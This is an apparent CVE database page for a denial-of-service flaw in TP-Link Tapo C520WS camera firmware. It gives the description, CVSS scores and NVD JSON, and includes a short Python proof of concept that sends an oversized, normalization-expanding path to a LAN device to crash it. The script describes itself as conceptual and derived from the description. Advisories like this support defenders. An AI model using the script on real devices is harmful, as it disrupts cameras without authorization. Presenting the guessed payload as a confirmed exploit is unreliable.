CVE-2026-34124

Description

A denial-of-service vulnerability was identified in TP-Link Tapo C520WS v2.6 within the HTTP request path parsing logic. The implementation enforces length restrictions on the raw request path but does not account for path expansion performed during normalization. An attacker on the adjacent network may send a crafted HTTP request to cause buffer overflow and memory corruption, leading to system interruption or device reboot.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:tapo_c520ws_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tp-link:tapo_c520ws:2.6:*:*:*:*:*:*:* - NOT VULNERABLE

TP-Link Tapo C520WS v2.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target IP address of the vulnerable device
target_ip = "192.168.1.100"
target_url = f"http://{target_ip}/"

# Craft a payload that expands during normalization
# Example: Many "../" sequences or encoded slashes might cause overflow
# Note: This is a conceptual PoC based on the description.
payload = "/" + "./" * 200 + "A" * 100

try:
    headers = {
        "User-Agent": "CVE-2026-34124-Test"
    }
    # Send the malicious request
    response = requests.get(target_url + payload, headers=headers, timeout=5)
    print(f"Request sent. Status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"Device likely crashed or unreachable: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34124
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34124
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34124/
[4] VulDB https://vuldb.com/cve/CVE-2026-34124
[5] https://www.tp-link.com/en/support/download/tapo-c520ws/#Firmware-Release-Notes
[6] https://www.tp-link.com/us/support/download/tapo-c520ws/#Firmware-Release-Notes
[7] https://www.tp-link.com/us/support/faq/5047/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34124", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-04-02T18:16:29.310", "lastModified": "2026-04-06T20:22:38.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service vulnerability was identified in TP-Link Tapo C520WS v2.6 within the HTTP request path parsing logic. The implementation enforces length restrictions on the raw request path but does not account for path expansion performed during normalization. An attacker on the adjacent network may send a crafted HTTP request to cause buffer overflow and memory corruption, leading to system interruption or device reboot."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tapo_c520ws_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.4", "matchCriteriaId": "710DD89A-E94F-4371-A03F-698C2F61D9C1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:tapo_c520ws:2.6:*:*:*:*:*:*:*", "matchCriteriaId": "72666951-E72F-4494-9A90-1F0B22E2F3CD"}]}]}], "references": [{"url": "https://www.tp-link.com/en/support/download/tapo-c520ws/#Firmware-Release-Notes", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Release Notes"]}, {"url": "https://www.tp-link.com/us/support/download/tapo-c520ws/#Firmware-Release-Notes", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Release Notes"]}, {"url": "https://www.tp-link.com/us/support/faq/5047/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Vendor Advisory"]}]}}